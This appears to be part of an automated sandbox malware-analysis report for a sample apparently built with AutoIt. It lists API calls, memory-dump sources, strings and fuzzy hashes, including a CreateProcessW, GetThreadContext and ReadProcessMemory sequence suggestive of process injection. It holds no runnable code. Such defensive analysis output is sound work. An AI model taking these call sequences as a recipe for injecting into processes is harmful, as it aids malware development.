                                                      • Instruction ID: 7e40c5cb043039eb0bdc9d0fbb2d87b4a524f6c0fcc80c8526a4534aedbc38b8
                                                      • Opcode Fuzzy Hash: 0628498d27eec9c256ba2700b1771e33c6aa125f58db0b061dac989cf53e0ff0
                                                      • Instruction Fuzzy Hash: E6114871510248BFDB24CFA5EC489AEBBB9FF05740F016469E845D7210D2719E409760
                                                      APIs
                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 00E9AECD
                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E9AEF1
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E9AF13
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1384407868.0000000000E99000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E99000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e99000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                      • String ID:
                                                      • API String ID: 2438371351-0
                                                      • Opcode ID: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
                                                      • Instruction ID: 34c8463fd5e8b0e699a0db996fdc82b6975a2a44bab540508e71218127c10b1a
                                                      • Opcode Fuzzy Hash: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
                                                      • Instruction Fuzzy Hash: 2B621A30A14258DBEB24DFA4D850BDEB372EF58304F10A1A9D10DFB2A0E7759E81CB59
                                                      APIs
                                                        • Part of subcall function 005E4EE5: _fseek.LIBCMT ref: 005E4EFD
                                                        • Part of subcall function 00649734: _wcscmp.LIBCMT ref: 00649824
                                                        • Part of subcall function 00649734: _wcscmp.LIBCMT ref: 00649837
                                                      • _free.LIBCMT ref: 006496A2
                                                      • _free.LIBCMT ref: 006496A9
                                                      • _free.LIBCMT ref: 00649714
                                                        • Part of subcall function 00602D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00609A24), ref: 00602D69
                                                        • Part of subcall function 00602D55: GetLastError.KERNEL32(00000000,?,00609A24), ref: 00602D7B
                                                      • _free.LIBCMT ref: 0064971C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                      • String ID:
                                                      • API String ID: 1552873950-0
                                                      • Opcode ID: 4a2872fe10592e1d84cc1262fcb1ccf713934ef89923d88bffb920594bd4d040
                                                      • Instruction ID: 6ce467d6dfa3f3293eeea77c5d184d6fcff22095d02e9820e900bfa574007c14
                                                      • Opcode Fuzzy Hash: 4a2872fe10592e1d84cc1262fcb1ccf713934ef89923d88bffb920594bd4d040
                                                      • Instruction Fuzzy Hash: 99515FB1944259AFDF289F65DC85AAEBB7AFF48300F10449EF249A3341DB715A80CF58
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                      • String ID:
                                                      • API String ID: 2782032738-0
                                                      • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                      • Instruction ID: d12441c460293979d212e6df83b4a29128627cd4496080ef44aae9d305de149e
                                                      • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                      • Instruction Fuzzy Hash: 1F41B3B4A407459BDB3C8E69C8809AB77A7AF85360B24C57DEA15876C0EF70DD418B40
                                                      APIs
                                                      • _memset.LIBCMT ref: 005E44CF
                                                        • Part of subcall function 005E407C: _memset.LIBCMT ref: 005E40FC
                                                        • Part of subcall function 005E407C: _wcscpy.LIBCMT ref: 005E4150
                                                        • Part of subcall function 005E407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 005E4160
                                                      • KillTimer.USER32(?,00000001,?,?), ref: 005E4524
                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 005E4533
                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0061D4B9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                      • String ID:
                                                      • API String ID: 1378193009-0
                                                      • Opcode ID: 063ebc0b4788879ea1355f640afd894eb2c0953eb4b4316cfcb1906605f25d7e
                                                      • Instruction ID: 787b6f6a5c574eadac8fb0ce60d360521f3e0ac9b9e5eeda78822664de9cb6b0
                                                      • Opcode Fuzzy Hash: 063ebc0b4788879ea1355f640afd894eb2c0953eb4b4316cfcb1906605f25d7e
                                                      • Instruction Fuzzy Hash: 4821D770504784AFE732DB249859BEBBFEDAF05314F08149EE6DE56281C3742A84CB51
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID: AU3!P/g$EA06
                                                      • API String ID: 4104443479-1337525066
                                                      • Opcode ID: 8523da049bc0b449d0bd1c3a6345df507896dcd0b384484c1e495541f13cb506
                                                      • Instruction ID: 93def59def3cabe8331c6699b30bc10e47742ed5a8517570803d503f0b356d13
                                                      • Opcode Fuzzy Hash: 8523da049bc0b449d0bd1c3a6345df507896dcd0b384484c1e495541f13cb506
                                                      • Instruction Fuzzy Hash: DC419C21A002D85BDF2D9F568D557FE7FA6BB85300F284464ECC29B282D6209D448BA2
                                                      APIs
                                                      • _memset.LIBCMT ref: 0061EA39
                                                      • GetOpenFileNameW.COMDLG32(?), ref: 0061EA83
                                                        • Part of subcall function 005E4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,005E4743,?,?,005E37AE,?), ref: 005E4770
                                                        • Part of subcall function 00600791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006007B0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Name$Path$FileFullLongOpen_memset
                                                      • String ID: X
                                                      • API String ID: 3777226403-3081909835
                                                      • Opcode ID: 10b8ef571162adadcd2e26ac4c7942b386faeaf307a3b6829e52ca8f671b41ea
                                                      • Instruction ID: fed385e795b7f20474eb01a37c5989b2a71302eb989c4c6865c311fb279d37f0
                                                      • Opcode Fuzzy Hash: 10b8ef571162adadcd2e26ac4c7942b386faeaf307a3b6829e52ca8f671b41ea
                                                      • Instruction Fuzzy Hash: 6A210530A002899FCF45DF94C849BEE7FFEAF49300F044019E548AB281DBF55A898FA1
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: __fread_nolock_memmove
                                                      • String ID: EA06
                                                      • API String ID: 1988441806-3962188686
                                                      • Opcode ID: 4105c05b2ed88ee442ddc239f27c09d4153962a12f5ecc93da7f6b7bd5279b7b
                                                      • Instruction ID: 41adbe034500c071fd31b9cf0dfe60fb830e2aa27ceb0c1e63858475045fcc2c
                                                      • Opcode Fuzzy Hash: 4105c05b2ed88ee442ddc239f27c09d4153962a12f5ecc93da7f6b7bd5279b7b
                                                      • Instruction Fuzzy Hash: A301F971C442187EDB58CBA8CC16EEE7BFCDF11301F00419EF552D21C1E875A6048B60
                                                      APIs
                                                      • GetTempPathW.KERNEL32(00000104,?), ref: 006498F8
                                                      • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0064990F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Temp$FileNamePath
                                                      • String ID: aut
                                                      • API String ID: 3285503233-3010740371
                                                      • Opcode ID: e709d709c5dc2a11c339784ab262a35101692d00592a248ca652774dd9c2cadd
                                                      • Instruction ID: 66de73a543edf4f29019ce7ad84c9089b4394488c9825311572f0df974ecbd6d
                                                      • Opcode Fuzzy Hash: e709d709c5dc2a11c339784ab262a35101692d00592a248ca652774dd9c2cadd
                                                      • Instruction Fuzzy Hash: 1DD05E7954030DABDB509BE0EC0EF9A773DE704704F0002B1FA54920A1EAB096988FA1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 464157dae277504031b1709dd6847f08ae52bee3f3d60ce6bf8d5f01e8bc73a6
                                                      • Instruction ID: 87459a72fc6fa97bda4d872d7d0d72f278dce74520b8bf578b640913cd1eca58
                                                      • Opcode Fuzzy Hash: 464157dae277504031b1709dd6847f08ae52bee3f3d60ce6bf8d5f01e8bc73a6
                                                      • Instruction Fuzzy Hash: C3F129716083419FCB14DF29C485A6ABBE6FF88324F14892EF8999B351D730E945CF82
                                                      APIs
                                                      • _memset.LIBCMT ref: 005E4370
                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 005E4415
                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 005E4432
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: IconNotifyShell_$_memset
                                                      • String ID:
                                                      • API String ID: 1505330794-0
                                                      • Opcode ID: f91d6b13f4b877ac37d72729065a600d5af6029d064c749702c334e82a461f24
                                                      • Instruction ID: 77382784bf9a79b632a1ad969229290b61ace037b2fb860eaa8367fa4643ca17
                                                      • Opcode Fuzzy Hash: f91d6b13f4b877ac37d72729065a600d5af6029d064c749702c334e82a461f24
                                                      • Instruction Fuzzy Hash: 13318FB05047419FC765EF25D88479BBBF9FB49308F000D2EE6DA82291E770AA84CF52
                                                      APIs
                                                      • __FF_MSGBANNER.LIBCMT ref: 00605733
                                                        • Part of subcall function 0060A16B: __NMSG_WRITE.LIBCMT ref: 0060A192
                                                        • Part of subcall function 0060A16B: __NMSG_WRITE.LIBCMT ref: 0060A19C
                                                      • __NMSG_WRITE.LIBCMT ref: 0060573A
                                                        • Part of subcall function 0060A1C8: GetModuleFileNameW.KERNEL32(00000000,006A33BA,00000104,?,00000001,00000000), ref: 0060A25A
                                                        • Part of subcall function 0060A1C8: ___crtMessageBoxW.LIBCMT ref: 0060A308
                                                        • Part of subcall function 0060309F: ___crtCorExitProcess.LIBCMT ref: 006030A5
                                                        • Part of subcall function 0060309F: ExitProcess.KERNEL32 ref: 006030AE
                                                        • Part of subcall function 00608B28: __getptd_noexit.LIBCMT ref: 00608B28
                                                      • RtlAllocateHeap.NTDLL(00CA0000,00000000,00000001,00000000,?,?,?,00600DD3,?), ref: 0060575F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                      • String ID:
                                                      • API String ID: 1372826849-0
                                                      • Opcode ID: 69dfeecf236e8324e4ba3d205e7c537539c5e7ec2c2af0cd3b9b39fc65f80938
                                                      • Instruction ID: 08e8460e200f35a1e888f7b34553fe23518f1a71abf30b87589c4a26afe310c2
                                                      • Opcode Fuzzy Hash: 69dfeecf236e8324e4ba3d205e7c537539c5e7ec2c2af0cd3b9b39fc65f80938
                                                      • Instruction Fuzzy Hash: AC01C0312C0B12DAD65C6774AC82A6B738B8B82762F10043AF4069B3C1DEB49D016A65
                                                      APIs
                                                      • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00649548,?,?,?,?,?,00000004), ref: 006498BB
                                                      • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00649548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 006498D1
                                                      • CloseHandle.KERNEL32(00000000,?,00649548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 006498D8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: File$CloseCreateHandleTime
                                                      • String ID:
                                                      • API String ID: 3397143404-0
                                                      • Opcode ID: a241cf019be0b41e35c20d12052098070c612fd9198be72d60d64dd33113bfc4
                                                      • Instruction ID: 63b974e199a50e6e7391e7eb4280ffcf6bb904fc610f34b60773785be7d2f25a
                                                      • Opcode Fuzzy Hash: a241cf019be0b41e35c20d12052098070c612fd9198be72d60d64dd33113bfc4
                                                      • Instruction Fuzzy Hash: 58E08632181214BBD7211B54FC09FCA7B5AAB067A0F104220FB14791E087F1151197D8
                                                      APIs
                                                      • _free.LIBCMT ref: 00648D1B
                                                        • Part of subcall function 00602D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00609A24), ref: 00602D69
                                                        • Part of subcall function 00602D55: GetLastError.KERNEL32(00000000,?,00609A24), ref: 00602D7B
                                                      • _free.LIBCMT ref: 00648D2C
                                                      • _free.LIBCMT ref: 00648D3E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: e572bb3280820806cd63a499e0b551fb9ad7511d2bd2374f1c7be07920dd6c79
                                                      • Instruction ID: bf43393c38e9995c5bd6616b869ed0a1b4f6349af650d555ea4452d8f0bb87c9
                                                      • Opcode Fuzzy Hash: e572bb3280820806cd63a499e0b551fb9ad7511d2bd2374f1c7be07920dd6c79
                                                      • Instruction Fuzzy Hash: 4AE012A1A426124ACB68A6B8B944AD713DE8F9C752754091DF40DD72C6CE64FC428128
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CALL
                                                      • API String ID: 0-4196123274
                                                      • Opcode ID: b483a976c2784867c8685b89823aef949116aba862c513d6d55c7df8e35dd232
                                                      • Instruction ID: e3e82d5e0fddaf1f967973d141ba087a3aed9592bae2be7d0bb42aeb118e1809
                                                      • Opcode Fuzzy Hash: b483a976c2784867c8685b89823aef949116aba862c513d6d55c7df8e35dd232
                                                      • Instruction Fuzzy Hash: D5225B74508381DFD728DF25C494A6ABBE2BF84304F15896DF89A9B362D731EC45CB82
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID:
                                                      • API String ID: 4104443479-0
                                                      • Opcode ID: 8787708196ce45b0a8645caae1a99237cce191730ca2271c137f8889e79cc621
                                                      • Instruction ID: 4a0493cfc7f4d8cddbc4468679d2b1725caa52ab6814c651780b77657658b518
                                                      • Opcode Fuzzy Hash: 8787708196ce45b0a8645caae1a99237cce191730ca2271c137f8889e79cc621
                                                      • Instruction Fuzzy Hash: 1E31B8B160464AAFC708DF69C8D1E69F7A9FF48310B15862DE559CB391EB30E950CB90
                                                      APIs
                                                      • IsThemeActive.UXTHEME ref: 005E4834
                                                        • Part of subcall function 0060336C: __lock.LIBCMT ref: 00603372
                                                        • Part of subcall function 0060336C: DecodePointer.KERNEL32(00000001,?,005E4849,00637C74), ref: 0060337E
                                                        • Part of subcall function 0060336C: EncodePointer.KERNEL32(?,?,005E4849,00637C74), ref: 00603389
                                                        • Part of subcall function 005E48FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 005E4915
                                                        • Part of subcall function 005E48FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 005E492A
                                                        • Part of subcall function 005E3B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 005E3B68
                                                        • Part of subcall function 005E3B3A: IsDebuggerPresent.KERNEL32 ref: 005E3B7A
                                                        • Part of subcall function 005E3B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,006A52F8,006A52E0,?,?), ref: 005E3BEB
                                                        • Part of subcall function 005E3B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 005E3C6F
                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 005E4874
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                      • String ID:
                                                      • API String ID: 1438897964-0
                                                      • Opcode ID: 6425b3b38f50d0b0d5ffc9f875ee19cd9037f685ff49e8818c9e58f4e2fa2dad
                                                      • Instruction ID: 8a4a9b4d87b05c8f1f1cd9e1a8d91753ed8bc49e50030399a80a689adbcbd1d0
                                                      • Opcode Fuzzy Hash: 6425b3b38f50d0b0d5ffc9f875ee19cd9037f685ff49e8818c9e58f4e2fa2dad
                                                      • Instruction Fuzzy Hash: C7118E719083919FC704EF2AE84990ABFE9FB89750F10951EF085832B1DBB0A644CF92
                                                      APIs
                                                        • Part of subcall function 0060571C: __FF_MSGBANNER.LIBCMT ref: 00605733
                                                        • Part of subcall function 0060571C: __NMSG_WRITE.LIBCMT ref: 0060573A
                                                        • Part of subcall function 0060571C: RtlAllocateHeap.NTDLL(00CA0000,00000000,00000001,00000000,?,?,?,00600DD3,?), ref: 0060575F
                                                      • std::exception::exception.LIBCMT ref: 00600DEC
                                                      • __CxxThrowException@8.LIBCMT ref: 00600E01
                                                        • Part of subcall function 0060859B: RaiseException.KERNEL32(?,?,?,00699E78,00000000,?,?,?,?,00600E06,?,00699E78,?,00000001), ref: 006085F0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                      • String ID:
                                                      • API String ID: 3902256705-0
